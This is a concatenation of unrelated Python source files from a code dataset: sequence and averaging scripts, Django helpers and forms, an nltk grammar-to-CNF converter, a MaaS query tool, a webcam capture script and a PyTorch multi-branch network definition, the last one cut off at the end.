sys\n\n\ndef nacci(n, count):\n seq = [0] * (n - 1) + [1]\n for i in range(count):\n seq.append(sum(seq[-n:]))\n return seq[n-2:]\n\n\ndef format_seq(seq):\n for el in seq:\n print(f\"& {el} \", end=\"\")\n print()\n\n\nformat_seq(nacci(int(sys.argv[1]), int(sys.argv[2])))\n","sub_path":"nacci.py","file_name":"nacci.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"588895987","text":"from django.contrib.admin import widgets\nfrom django.utils.safestring import mark_safe\n\nclass MultiFileInput(widgets.AdminFileWidget):\n\n def render(self, name, value, attrs=None):\n attrs['multiple'] = 'true'\n output = super(MultiFileInput, self).render(name, value, attrs=attrs)\n return mark_safe(output)\n\n# Add word mini in name image\ndef _add_mini(link):\n mini_jpg = link.split(\".\")\n mini_jpg.insert(-1,\"mini\")\n if mini_jpg[-1].low not in ['jpeg','jpg']:\n mini_jpg[-1]='jpeg'\n return \".\".join(mini_jpg)\n\ndef nomeric(n):\n a = 1\n for i in n:\n a += 1\n return a\n\n\ndef switch_lang_to_ua(url):\n if 'ua' not in url:\n direct = str(url).split('/')\n direct.insert(1,'ua')\n url_ua = '/'.join(direct)\n return url_ua\n elif 'ua' in url:\n return url\n\ndef switch_lang_ru(url):\n if 'ua' in url:\n direct = str(url).split('/')\n direct.remove('ua')\n url_ru = '/'.join(direct)\n return url_ru\n else:\n return url\n\n\nif __name__ == '__main__':\n pass\n print('Need import this module.')","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"126843297","text":"def average(amount):\n #I'll write the code to find the average of a set of arrays here\n avarray = []\n for i in range(amount):\n array = raw_input().split(' ')\n array = map(int, array)\n ave = round(sum(array) / (float(len(array) - 1)), 0)\n avarray.append(int(ave))\n print(\"[{}]\".format(\" \".join(map(str, avarray))))\n\naverage(input())\n","sub_path":"Code Abbey Problem 16.py","file_name":"Code Abbey Problem 16.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148887368","text":"import nltk, copy, collections\n\n\nclass CFNDataStructures():\n\n __grammarProductions = set()\n __startProductionRules = set()\n __unitProductionRules = set()\n __hybridProductionRules = set()\n __longProductionRules = set()\n __cnfRules = set()\n __nonTerminals = set()\n __removeProductionRules = set()\n __nonTerminalsDict = {}\n __newProductions = set()\n __terminalProductions = set()\n __originalGrammarProductionCount = 0\n __newRuleCounter = 1\n __grammarProductionCount = 0\n __unitProductionRulesCount = 0\n __hybridProductionRulesCount = 0\n __longProductionRulesCount = 0\n __cnfRulesCount = 0\n __nonTerminalsCount = 0\n __removeProductionRulesCount = 0\n __terminalProductionsCount = 0\n __nonTerminalsDictCount = 0\n\n def __init__(self, grammarProductions):\n self.name = 'CFNDataStructures'\n #self.__startProductionRules = set()\n #self.unitProductionRules = set()\n #self.hybridProductionRules = set()\n #self.longProductionRules = set()\n #self.cnfRules = set()\n #self.nonTerminals = set()\n #self.removeProductionRules = set()\n #self.nonTerminalsDict = {}\n #self.newProductions = set()\n self.__grammarProductions = grammarProductions.copy()\n self.__setoriginalGrammarProductionCount(len(grammarProductions))\n\n print(\"CFNDataStructures --> Constructor\")\n\n def __setoriginalGrammarProductionCount(self,value):\n CFNDataStructures.__originalGrammarProductionCount = value\n\n def getstartProductionRules(self):\n return CFNDataStructures.__startProductionRules\n\n def getunitProductionRules(self):\n return self.__unitProductionRules\n\n def gethybridProductionRules(self):\n return self.__hybridProductionRules\n\n def getlongProductionRules(self):\n return self.__longProductionRules\n\n def getcnfRules(self):\n return self.__cnfRules\n\n def getremoveProductionRules(self):\n return self.__removeProductionRules\n\n def setnonTerminals(self):\n for i in self.__grammarProductions:\n self.__nonTerminals.add(i.lhs())\n for e in i.rhs():\n if isinstance(e,nltk.grammar.Nonterminal):\n self.__nonTerminals.add(e)\n\n\n\n def getnonTerminals(self):\n return self.__nonTerminals\n\n def getnonTerminalsDict(self):\n return self.__nonTerminalsDict\n\n def getnewProductions(self):\n return self.__newProductions\n\n def getgrammarProductions(self):\n return self.__grammarProductions\n\n def setterminalProductions(self,productionsList):\n for i in productionsList:\n if len(i.rhs()) == 1 and i.is_lexical():\n self.__terminalProductions.add(i)\n\n def getterminalProductions(self):\n return self.__terminalProductions\n\n #update production set\n def updateGrammarProductions(self):\n for prod in self.getremoveProductionRules():\n self.getgrammarProductions().discard(prod)\n self.getgrammarProductions().update(self.getnewProductions())\n\n #Long Rule Count - Do this first\n def toCNFLongRuleConversion(self):\n print(\"** Running Long Rule cnf conversion Analysis\")\n for prod in self.getgrammarProductions():\n if len(prod.rhs()) > 2:\n self.getlongProductionRules().add(prod)\n print(\"** Applying Long Rule cnf conversion to prodution [%s]\"%str(prod))\n self.getremoveProductionRules().add(prod)\n #tempProds = (prod)\n lhs = prod.lhs()\n rhsList = list(prod.rhs())\n\n while True:\n xTempNonTerminal = 'X'+str(self.__newRuleCounter)\n xNonTerminal = nltk.grammar.Nonterminal(xTempNonTerminal)\n tempRHSList = [rhsList.pop(0),rhsList.pop(0)]\n newXProd = nltk.grammar.Production(xNonTerminal,tempRHSList)\n print(\"**New Production [%s] created\"%str(newXProd))\n self.getnonTerminals().add(xNonTerminal)\n self.getnewProductions().add(newXProd)\n rhsList.insert(0,xNonTerminal)\n if len(rhsList) <= 2:\n newEndProduction = nltk.grammar.Production(lhs,rhsList)\n print(\"**New Production [%s] created\"%str(newEndProduction))\n self.getnewProductions().add(newEndProduction)\n break\n self.__newRuleCounter += 1\n\n #update production set\n self.updateGrammarProductions()\n #End update of long rule\n\n #Hybrid Rule Conversion\n def toCNFHybridRuleConversion(self):\n print(\"** Running Hybrid Rule cnf conversion Analysis\")\n\n for prod in self.getgrammarProductions():\n\n if len(prod.rhs()) == 2 and not prod.is_nonlexical():\n print(\"** Applying Hybrid Rule cnf conversion to production [%s]\"%str(prod))\n self.gethybridProductionRules().add(prod)\n\n rhsIndex = 0\n tempRHSList = []\n for rhs in prod.rhs():\n if not isinstance(rhs,nltk.grammar.Nonterminal):\n print(\"Found terminal [%s] as a rhs attribute of production [%s]\"%(rhs,str(prod)))\n self.getremoveProductionRules().add(prod)\n #rhs = rhs.unicode_repr()\n newNonTerminal = nltk.grammar.Nonterminal(rhs)\n print(newNonTerminal._symbol)\n self.getnonTerminals().add(newNonTerminal)\n print(\"**New NonTerminal [%s] created from string [%s]\"%(str(newNonTerminal),str(rhs)))\n newProduction1 = nltk.grammar.Production(newNonTerminal,[rhs])\n print(\"**New Production [%s] created\"%str(newProduction1))\n self.getnewProductions().add(newProduction1)\n if rhsIndex == 0:\n tempRHSList.insert(0,prod.rhs()[1])\n else:\n tempRHSList.insert(0,prod.rhs()[0])\n tempRHSList.insert(rhsIndex,newNonTerminal)\n newProduction2 = nltk.grammar.Production(prod.lhs(),tempRHSList)\n print(\"**New Production [%s] created\"%str(newProduction2))\n self.getnewProductions().add(newProduction2)\n #End for-loop\n #End if\n #End for-loop\n #update production set\n self.updateGrammarProductions()\n\n\n #End function\n\n #End Hybrid Rule Conversion\n\n #Unit Production Rule Conversion\n def toCNFUnitProductionRuleConversion(self):\n print(\"** Running Unit Production Rule cnf conversion Analysis\")\n for prod in self.getgrammarProductions():\n if len(prod.rhs()) == 1 and prod.is_nonlexical():\n print(\"** Applying Unit Production Rule cnf conversion to prodution [%s]\"%str(prod))\n self.getunitProductionRules().add(prod)\n #End for-loop\n #get all leftcorner non-terminals per unit production\n newProductionSet = set()\n for unit in self.getunitProductionRules():\n unitLHS = unit.lhs()\n symbol = unit.lhs()\n notComplete = True\n count = 0\n while notComplete:\n #Outter Most Unit Set\n recursionCount = 0\n try:\n if symbol in self.getnonTerminalsDict():\n unitLFTCornerSet = self.getnonTerminalsDict().get(symbol)\n print(\"Symbol [%s], lftCornerSet [%s], recursion count [%d]\"%(str(symbol),str(unitLFTCornerSet),recursionCount))\n #unitLFTCornerSet = list(unitLFTCornerSet)\n if symbol in unitLFTCornerSet:\n unitLFTCornerSet.remove(symbol)\n isRecursion = False\n\n for item in unitLFTCornerSet:\n print(\"item [%s]\"%str(item))\n for i in self.getgrammarProductions():\n print(\"i [%s]\"%str(i))\n if i.lhs() == item:\n print(\"lhs [%s], item [%s]\"%(str(i.lhs()),str(item)))\n if len(i.rhs()) == 1:\n print(\"i rhs length [%d]\"%len(i.rhs()))\n if not isinstance(item,nltk.grammar.Nonterminal):\n print(\"Not instance of Nonterminal [%s]\"%str(item))\n #is a terminal, make new production for this unit\n newProduction = nltk.grammar.Production(unitLHS,i.rhs())\n newProductionSet.add(newProduction)\n self.getnewProductions().add(newProduction)\n print(\"**New Production [%s] created\"%str(newProduction))\n else:\n #recursive search\n print(\"Is a Nonterminal [%s]\"%str(item))\n symbol = i.rhs()[0]\n print(\"***INFO***: New leftcorner lookup value [%s]\"%str(symbol))\n if isinstance(symbol,nltk.grammar.Nonterminal):\n isRecursion = True\n recursionCount += 1\n raise StopIteration(\"StopIteration: Nonterminal Found, isRecursion[%s]\"%isRecursion)\n else:\n print(\"Not instance of Nonterminal [%s]\"%str(symbol))\n #is a terminal, make new production for this unit\n newProduction = nltk.grammar.Production(unitLHS,[symbol])\n newProductionSet.add(newProduction)\n self.getnewProductions().add(newProduction)\n print(\"**New Production [%s] created\"%str(newProduction))\n #raise StopIteration(\"StopIteration: Single terminal found\")\n else:\n #in CNF form, add new production\n #print(\"i rhs length > 1 [%d] i [%s]\"(len(i.rhs()),str(i)))\n newProduction = nltk.grammar.Production(unitLHS,i.rhs())\n newProductionSet.add(newProduction)\n self.getnewProductions().add(newProduction)\n print(\"**New Production [%s] created\"%str(newProduction))\n #raise StopIteration(\"StopIteration: Multiple RHS found\")\n #end loop on grammar productions\n\n \n\n\n except StopIteration:\n print(\"StopIteration Raised, isRecursion[%s] notComplete[%s]\"%(isRecursion,notComplete))\n if isRecursion:\n continue\n else:\n notComplete = False\n else:\n print(\"Symbol [%s] not in nonterminal dict\"%str(symbol))\n\n\n\n #mark unit production for removal\n self.getremoveProductionRules().add(unit)\n\n #End unit production search\n\n #update production set\n self.updateGrammarProductions()\n #End Unit Production Rule Conversion\n\n\n def printDataStructureReport(self):\n CFNDataStructures.__grammarProductionCount = len(self.getgrammarProductions())\n CFNDataStructures.__cnfRulesCount = len(self.getcnfRules())\n CFNDataStructures.__hybridProductionRulesCount = len(self.gethybridProductionRules())\n CFNDataStructures.__longProductionRulesCount = len(self.getlongProductionRules())\n CFNDataStructures.__nonTerminalsCount = len(self.getnonTerminals())\n CFNDataStructures.__unitProductionRulesCount = len(self.getunitProductionRules())\n CFNDataStructures.__removeProductionRulesCount = len(self.getremoveProductionRules())\n CFNDataStructures.__terminalProductionsCount = len(self.getterminalProductions())\n CFNDataStructures.__nonTerminalsDictCount = len(self.getnonTerminalsDict())\n print(\"***** CNF Data Structure Report: \\n*** grammarProductions count at start [%d]\"%CFNDataStructures.__originalGrammarProductionCount)\n print(\"*** grammarProductions count[%d]\"%CFNDataStructures.__grammarProductionCount)\n print(\"*** cnfRulesCount count[%d]\"%CFNDataStructures.__cnfRulesCount)\n print(\"*** hybridProductionRulesCount count[%d]\"%CFNDataStructures.__hybridProductionRulesCount)\n print(\"*** longProductionRulesCount count[%d]\"%CFNDataStructures.__longProductionRulesCount)\n print(\"*** nonTerminalsCount count[%d]\"%CFNDataStructures.__nonTerminalsCount)\n print(\"*** unitProductionRulesCount count[%d]\"%CFNDataStructures.__unitProductionRulesCount)\n print(\"*** removeProductionRulesCount count[%d]\"%CFNDataStructures.__removeProductionRulesCount)\n print(\"*** terminalProductionsCount count[%d]\"%CFNDataStructures.__terminalProductionsCount)\n print(\"*** nonTerminalsDict count[%d]\"%CFNDataStructures.__nonTerminalsDictCount)\n\n","sub_path":"assignments/ling_571_h2_context_free_parser/ling_utils/cnf_dataStructures.py","file_name":"cnf_dataStructures.py","file_ext":"py","file_size_in_byte":13848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"224925800","text":"\"\"\"\nAuthor: Aggelos Kolaitis \nLast Update: 2019/04/25\nDescription: Gets machine info directly from MaaS\n\n# Usage:\n$ mjt_get_machine [system_id]\n\n# Notes\n* This script talks directly to the MaaS API, ignoring the local db\n\"\"\"\n\nimport json\nimport argparse\n\nfrom maasjuju_toolkit.util import session, exit_with_error, MaaSError\n\n\ndef get_machine(system_id):\n \"\"\"asks MaaS for information and print it out\"\"\"\n\n try:\n m = session().Machine.read(system_id=system_id)\n except MaaSError as e:\n exit_with_error(f'[{system_id}] [ERROR] {e}')\n\n print(json.dumps({\n 'system_id': system_id,\n 'ip_addresses': ','.join(m['ip_addresses']),\n 'tags': ','.join(m['tag_names']),\n 'hostname': m['hostname'],\n 'domain': m['domain']['name'],\n 'fqdn': m['fqdn'],\n 'status': m['status_name']\n }, indent=2))\n\n\ndef main():\n \"\"\"calls get_machine()\"\"\"\n parser = argparse.ArgumentParser(\n description='Get machine details directly from MaaS'\n )\n parser.add_argument(\n 'system_id',\n type=str,\n )\n\n args = parser.parse_args()\n get_machine(args.system_id)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"maasjuju_toolkit/maas/get_machine.py","file_name":"get_machine.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"116986871","text":"from django import forms\nfrom django.forms.models import inlineformset_factory\n\nfrom .models import Timecard, TimecardObject\n\nclass TimecardForm(forms.ModelForm):\n class Meta:\n model = Timecard\n exclude = ['time_spent', 'reporting_period', 'user']\n\nclass TimecardObjectForm(forms.ModelForm):\n class Meta:\n model = TimecardObject\n fields = ['project', 'time_percentage']\n\nTimecardFormSet = inlineformset_factory(Timecard, TimecardObject)","sub_path":"tock/hours/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"544716737","text":"import cv2\n\nvideo_capture = cv2.VideoCapture(0)\ncv2.namedWindow(\"cam-test\")\n\nimg_counter = 0\n\nwhile True:\n ret, frame = video_capture.read()\n\n if ret:\n cv2.imshow(\"cam-test\", frame)\n\n k = cv2.waitKey(1)\n\n if k & 0xFF == ord('s'): # s key pressed\n img_name = \"opencv_frame_{}.jpg\".format(img_counter)\n cv2.imwrite(img_name, frame) # frame: img\n print(\"{} written!\".format(img_name)) # print log\n img_counter += 1\n\n # 이미지 파일 이름을 JSON 형태로 작성\n '''\n data = {\n \"img_file_name\": img_name\n }\n '''\n\n if k & 0xFF == ord('q'):\n break\n\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n","sub_path":"example/capture_image_by_webcam.py","file_name":"capture_image_by_webcam.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"477308234","text":"# -*- coding: utf-8 -*-\n__author__ = 'ooo'\n__date__ = '2019/1/9 12:17'\n\nimport math, torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom xmodules.classifier import ViewLayer, AdaAvgPool, Activate\nfrom xmodules.transition import TransitionA\nfrom xmodules.rockblock import RockBlock, RockBlockQ, RockBlockX, RockBlockO\npolate = F.interpolate\n\n\n\"\"\"\n RealNet => + DoubleCouple + SingleCouple + Summary(+merge +split) + BottleNeck\n\"\"\"\n\n\nclass DoubleCouple(nn.Module):\n _trans = {'A': TransitionA}\n\n def __init__(self, indepth, growth, active='relu', first=False, after=True, down=False,\n trans='A', reduce=0.5, convkp='T', inmode='nearest', classify=0, nclass=1000,\n last_branch=1, last_down=False, last_expand=0):\n super(DoubleCouple, self).__init__()\n assert last_branch <= 4, ' of DoubleCouple should be <= 4...'\n self.indepth = indepth\n self.growth = growth\n self.classify = classify\n self.nclass = nclass\n self.active = getattr(nn.functional, active)\n self.first = first\n self.after = after\n self.down = down\n self.trans = trans\n self.reduce = reduce\n self.trans_func = self._trans[trans]\n self.last_branch = last_branch\n self.last_down = last_down\n self.last_expand = last_expand\n self.inmode = inmode\n self.convkp = convkp\n kp = {'T': (3, 1), 'O': (1, 0)}[convkp]\n\n first_outdepth = indepth + growth if self.first else growth\n self.bn1 = nn.BatchNorm2d(indepth)\n self.conv1 = nn.Conv2d(indepth, first_outdepth, 3, stride=2, padding=1, bias=False, dilation=1)\n self.bn2 = nn.BatchNorm2d(indepth + growth)\n self.conv2 = nn.Conv2d(indepth + growth, growth, 3, stride=2, padding=1, bias=False, dilation=1)\n self.bn3 = nn.BatchNorm2d(indepth + growth)\n self.conv3 = nn.Conv2d(indepth + growth, growth, kp[0], stride=1, padding=kp[1], bias=False, dilation=1)\n self.bn4 = nn.BatchNorm2d(indepth + growth)\n self.conv4 = nn.Conv2d(indepth + growth, growth, kp[0], stride=1, padding=kp[1], bias=False, dilation=1)\n\n if self.classify > 0:\n self.classifier = nn.Sequential(\n nn.BatchNorm2d(indepth + growth),\n Activate(active),\n AdaAvgPool(),\n ViewLayer(dim=-1),\n nn.Linear(indepth + growth, nclass)\n )\n\n if self.after:\n if self.down:\n outdepth = int(math.floor((indepth + growth) * reduce))\n self.down_res4 = self.trans_func(indepth + growth, outdepth)\n self.down_res3 = self.trans_func(indepth + growth, outdepth)\n self.down_res2 = self.trans_func(indepth + growth, outdepth)\n self.down_res1 = self.trans_func(indepth + growth, outdepth)\n else:\n if self.last_down:\n outdepth = indepth + growth + last_expand\n if self.last_branch >= 1:\n self.down_last4 = self.trans_func(indepth + growth, outdepth)\n if self.last_branch >= 2:\n self.down_last3 = self.trans_func(indepth + growth, outdepth)\n if self.last_branch >= 3:\n self.down_last2 = self.trans_func(indepth + growth, outdepth)\n if self.last_branch >= 4:\n self.down_last1 = self.trans_func(indepth + growth, outdepth)\n else:\n if self.classify > 0 and self.last_branch == 4:\n # 最后一个Couple的中间层被当做branch输出而对接在Summary上.\n # 因此,删除此Couple自带的Classifier,以免与Summary中的Classifier重复.\n delattr(self, 'classifier')\n self.classify = 0\n print('Note: 1 xfc will be deleted because of duplicated with the lfc!')\n\n def forward(self, x):\n if isinstance(x, (list, tuple)):\n x1, x2, x3, x4, pred = x # 大 中 小 中\n else:\n x1, x2, x3, x4, pred = x, None, None, None, None\n res1 = self.conv1(self.active(self.bn1(x1)))\n res1 = torch.cat((res1, x4), 1) if not self.first else res1\n res2 = self.conv2(self.active(self.bn2(res1)))\n res2 = torch.cat((res2, x3), 1)\n out = res2\n res3 = self.conv3(self.active(self.bn3(polate(res2, scale_factor=2, mode=self.inmode))))\n res3 = torch.cat((res3, x2), 1)\n res4 = self.conv4(self.active(self.bn4(polate(res3, scale_factor=2, mode=self.inmode))))\n res4 = torch.cat((res4, x1), 1)\n\n if self.classify > 0:\n out = self.classifier(out)\n else:\n out = None\n pred.append(out)\n\n if self.after:\n if self.down:\n res4 = self.down_res4(res4)\n res3 = self.down_res3(res3)\n res2 = self.down_res2(res2)\n res1 = self.down_res1(res1)\n return res4, res3, res2, res1, pred\n else:\n if self.last_branch == 1:\n if self.last_down:\n res4 = self.down_last4(res4)\n return res4, pred\n elif self.last_branch == 2:\n if self.last_down:\n res4 = self.down_last4(res4)\n res3 = self.down_last3(res3)\n return res4, res3, pred\n elif self.last_branch == 3:\n if self.last_down:\n res4 = self.down_last4(res4)\n res3 = self.down_last3(res3)\n res2 = self.down_last2(res2)\n return res4, res3, res2, pred\n elif self.last_branch == 4:\n if self.last_down:\n res4 = self.down_last4(res4)\n res3 = self.down_last3(res3)\n res2 = self.down_last2(res2)\n res1 = self.down_last1(res1)\n return res4, res3, res2, res1, pred\n else:\n raise ValueError(' of DoubleCouple should be <= 3!')\n\n\nclass SingleCouple(nn.Module):\n _trans = {'A': TransitionA}\n\n def __init__(self, indepth, growth, active='relu', first=False, after=True, down=False,\n trans='A', reduce=0.5, convkp='T', inmode='nearest', classify=0, nclass=1000,\n last_branch=1, last_down=False, last_expand=0):\n super(SingleCouple, self).__init__()\n assert last_branch <= 2, ' of SingleCouple should be <= 2...'\n self.indepth = indepth\n self.growth = growth\n self.active = getattr(nn.functional, active)\n self.first = first\n self.after = after\n self.down = down\n self.trans = trans\n self.reduce = reduce\n self.trans_func = self._trans[trans]\n self.classify = classify\n self.nclass = nclass\n self.last_branch = last_branch\n self.last_down = last_down\n self.last_expand = last_expand\n self.inmode = inmode\n self.convkp = convkp\n kp = {'T': (3, 1), 'O': (1, 0)}[convkp]\n\n first_outdepth = indepth + growth if self.first else growth\n self.bn1 = nn.BatchNorm2d(indepth)\n self.conv1 = nn.Conv2d(indepth, first_outdepth, 3, stride=2, padding=1, bias=False, dilation=1)\n self.bn2 = nn.BatchNorm2d(indepth + growth)\n self.conv2 = nn.Conv2d(indepth + growth, growth, kp[0], stride=1, padding=kp[1], bias=False, dilation=1)\n\n if self.classify > 0:\n self.classifier = nn.Sequential(\n nn.BatchNorm2d(indepth + growth),\n Activate(active),\n AdaAvgPool(),\n ViewLayer(dim=-1),\n nn.Linear(indepth + growth, nclass)\n )\n if self.after:\n if self.down:\n outdepth = int(math.floor((indepth + growth) * reduce))\n self.down_res2 = self.trans_func(indepth + growth, outdepth)\n self.down_res1 = self.trans_func(indepth + growth, outdepth)\n else:\n if self.last_down:\n outdepth = indepth + growth + last_expand\n if self.last_branch >= 1:\n self.down_last2 = self.trans_func(indepth + growth, outdepth)\n if self.last_branch >= 2:\n self.down_last1 = self.trans_func(indepth + growth, outdepth)\n else:\n if self.classify > 0 and self.last_branch == 2:\n # 此时,最后一个Couple的中间层被当做branch输出而对接在Summary上.\n # 因此,删除此Couple自带的Classifier,以免与Summary中的Classifier重复.\n delattr(self, 'classifier')\n self.classify = 0\n print('Note: 1 xfc will be deleted because of duplicate with the last-fc!')\n\n def forward(self, x):\n if isinstance(x, (list, tuple)):\n x1, x2, x3, x4, pred = x # 大 中 小 中\n else:\n x1, x2, x3, x4, pred = x, None, None, None, None\n res1 = self.conv1(self.active(self.bn1(x1)))\n res1 = torch.cat((res1, x2), 1) if not self.first else res1\n out = res1\n res2 = self.conv2(self.active(self.bn2(polate(res1, scale_factor=2, mode=self.inmode))))\n res2 = torch.cat((res2, x1), 1)\n\n if self.classify > 0:\n out = self.classifier(out)\n else:\n out = None\n pred.append(out)\n\n if self.after:\n if self.down:\n res2 = self.down_res2(res2)\n res1 = self.down_res1(res1)\n return res2, res1, None, None, pred\n else:\n if self.last_branch == 1:\n if self.last_down:\n res2 = self.down_last2(res2)\n return res2, pred\n elif self.last_branch == 2:\n if self.last_down:\n res2 = self.down_last2(res2)\n res1 = self.down_last1(res1)\n return res2, res1, pred\n else:\n raise ValueError(' of SingleCouple should be <= 2!')\n\n\nclass SummaryBlock(nn.Module):\n METHOD = ['split', 'merge']\n\n def __init__(self, indepth, branch=1, active='relu', nclass=1000, method='split'):\n super(SummaryBlock, self).__init__()\n assert len(indepth) == branch, '各分类分支的通道数必须全部给定,so, len of == branch.'\n assert method in self.METHOD, 'Unknown %s for SummaryBlock.' % method\n self.indepth = indepth\n self.branch = branch\n self.active = active\n self.nclass = nclass\n self.method = method\n self.active_fc = True\n\n if method == 'split':\n for i in range(branch):\n fc_layer = nn.Sequential(\n nn.BatchNorm2d(indepth[i]),\n Activate(active),\n AdaAvgPool(),\n ViewLayer(),\n nn.Linear(indepth[i], nclass))\n setattr(self, 'classifier%s' % (i + 1), fc_layer)\n elif method == 'merge':\n for i in range(branch):\n view_layer = nn.Sequential(\n nn.BatchNorm2d(indepth[i]),\n Activate(active),\n AdaAvgPool(),\n ViewLayer())\n setattr(self, 'pool_view%s' % (i + 1), view_layer)\n self.classifier = nn.Linear(sum(indepth), nclass)\n else:\n raise NotImplementedError\n\n def forward(self, x):\n # x1, x2, x3, x4 extracted form x is \"big, media, small, media\" respectively.\n # 为确保fc(xi)的顺序与layer_i在model内的顺序相一致和相对应,\n # so the output order should be [fc(x4), fc(x3), fc(x2), fc(x1)] or [fc([x4, x3, x2, x1])]\n if not self.active_fc:\n return x\n assert isinstance(x, (tuple, list)), 'x must be tuple, but %s' % type(x)\n assert len(x) == self.branch + 1, 'pred should be input together with x'\n x, pred = x[:self.branch], x[-1]\n if self.method == 'split':\n xx = []\n for i, xi in enumerate(x):\n xi = getattr(self, 'classifier%s' % (i + 1))(xi)\n xx.append(xi)\n pred.extend(xx[::-1])\n elif self.method == 'merge':\n x = [getattr(self, 'pool_view%s' % (i + 1))(xi) for i, xi in enumerate(x)]\n x = torch.cat(x[::-1], dim=1)\n x = self.classifier(x)\n pred.append(x)\n return pred\n\n\nclass RealNet(nn.Module):\n _couple = {'D': DoubleCouple, 'S': SingleCouple}\n _rocker = {'X': RockBlockX, 'Q': RockBlockQ, 'O': RockBlockO}\n\n def __init__(self, stages=4, rock='O', branch=4, indepth=16, growth=12, multiway=4,\n layers=(3, 3, 3, 3), blocks=('D', 'D', 'D', 'D'), classify=(0, 0, 0, 0),\n trans=('A', 'A', 'A', 'A'), reduction=(0.5, 0.5, 0.5, 0.5), convkp=('T', 'T', 'T', 'O'),\n last_branch=4, last_down=False, last_expand=0, poolmode='avg', active='relu',\n summer='split', nclass=1000, inmode='nearest'):\n super(RealNet, self).__init__()\n assert stages <= min(len(layers), len(blocks), len(classify), len(trans),\n len(reduction), len(convkp)), \\\n 'Hyper Pameter Not Enough to Match Stages Nums:%s!' % stages\n assert stages == sum([bool(l) for l in layers[:stages]]), \\\n 'Hyper Pameter and cannot match, ' \\\n 'number of no-zero value in should be == !' % (stages, layers)\n assert stages == sum([bool(r) for r in reduction[:stages - 1]]) + 1, \\\n 'Hyper Pameter and cannot match, ' \\\n 'number of no-zero value in should be == !' % (stages, reduction)\n assert sorted(blocks[:stages]) == list(blocks[:stages]), \\\n 'DoubleCouple must be ahead of SingleCouple! But your %s' % 'is ->'.join(blocks[:stages])\n assert (blocks[0] == 'D' and branch == 3) or (blocks[0] == 'S' and branch == 2), \\\n 'DoubleCouple need ==3, SingleCouple need ==2, ' \\\n 'but your %s is %s' % (blocks[0], branch)\n assert len(convkp) == sum([1 for k in convkp if k in ['T', 'O']]), \\\n 'Hyper Pameter only can contain T or O.' % (convkp,)\n assert multiway in [3, 4], ' of dense connections now only support [3 or 4]!'\n\n dataset = ['imagenet', 'cifar'][nclass != 1000]\n if dataset == 'cifar':\n assert stages <= 4, 'cifar stages should <= 4'\n elif dataset == 'imagenet':\n assert stages <= 5, 'imagenet stages should <= 5'\n\n self.stages = stages\n self.rock = self._rocker[rock]\n self.branch = branch\n self.indepth = indepth\n self.growth = growth\n self.multiway = multiway\n self.layers = layers\n self.classify = classify\n self.trans = trans\n self.reduction = reduction\n self.convkp = convkp\n self.poolmode = poolmode\n self.active = active\n self.last_branch = last_branch\n self.last_down = last_down\n self.last_expand = last_expand\n self.nclass = nclass\n self.inmode = inmode\n\n self.after = [True for _ in range(stages - 1)] + [False]\n self.layer0 = self.rock(indepth=3, outdepth=indepth, branch=branch, dataset=dataset)\n for i in range(stages):\n dense_stage = self._make_dense_stage(self._couple[blocks[i]], layers[i], indepth, growth,\n classify[i], self.after[i], trans[i], reduction[i],\n convkp[i], last_branch, last_down, last_expand, i)\n setattr(self, 'dense%s' % (i + 1), dense_stage)\n indepth += layers[i] * growth\n if i < stages - 1:\n indepth = int(math.floor(indepth * reduction[i]))\n elif i == stages - 1:\n indepth = indepth + last_expand if last_down else indepth # + growth\n\n indepth = [indepth] * last_branch\n self.summary = SummaryBlock(indepth, last_branch, active, nclass=nclass, method=summer)\n\n def _make_dense_stage(self, block, nums, indepth, growth, cfy, after, trans, reduce, convkp,\n last_branch, last_down, last_expand, stage):\n layers = []\n for i in range(nums - 1):\n if self.multiway == 3:\n first = True # 固定所有block内第1个conv1层的outdepth\n elif self.multiway == 4:\n first = bool(stage == 0 and i == 0) # 固定第1个block内的第1个conv1层的outdepth\n layers.append(block(indepth=indepth, growth=growth, active=self.active, first=first,\n after=True, down=False, trans=trans, reduce=reduce, convkp=convkp,\n classify=cfy, nclass=self.nclass, inmode=self.inmode,\n last_branch=last_branch, last_down=last_down, last_expand=last_expand))\n indepth += growth\n\n if self.multiway == 3:\n first = True\n elif self.multiway == 4:\n if stage == 0 and nums == 1: first = True # 第1个stage的第1个block\n if stage == 0 and nums > 1: first = False # 第1个stage的第2+个block\n if stage > 0: first = False # 第2+个stage内的blocks\n layers.append(block(indepth=indepth, growth=growth, active=self.active, first=first,\n after=after, down=True, trans=trans, reduce=reduce, convkp=convkp,\n classify=cfy, nclass=self.nclass, inmode=self.inmode,\n last_branch=last_branch, last_down=last_down, last_expand=last_expand))\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.layer0(x)\n for i in range(self.stages):\n x = getattr(self, 'dense%s' % (i + 1))(x)\n # utils.print_size(x, True)\n x = self.summary(x) # x <=> [x, pred]\n x = [p for p in x if p is not None]\n return x\n\n def forward2(self, x):\n # deprecated !!!!\n ok = False\n x = self.layer0(x)\n xtils.print_size(x, ok)\n x = self.dense1(x)\n xtils.print_size(x, ok)\n x = self.trans1(x)\n xtils.print_size(x, ok)\n x = self.dense2(x)\n xtils.print_size(x, ok)\n x = self.trans2(x)\n xtils.print_size(x, ok)\n x = self.dense3(x)\n xtils.print_size(x, ok)\n x = self.trans3(x)\n xtils.print_size(x, ok)\n x = self.dense4(x)\n xtils.print_size(x, ok)\n if self.last_trans:\n x = self.trans4(x)\n xtils.print_size(x, ok)\n x = self.summary(x)\n x = [p for p in x if p is not None]\n return x\n\n\nif __name__ == '__main__':\n import 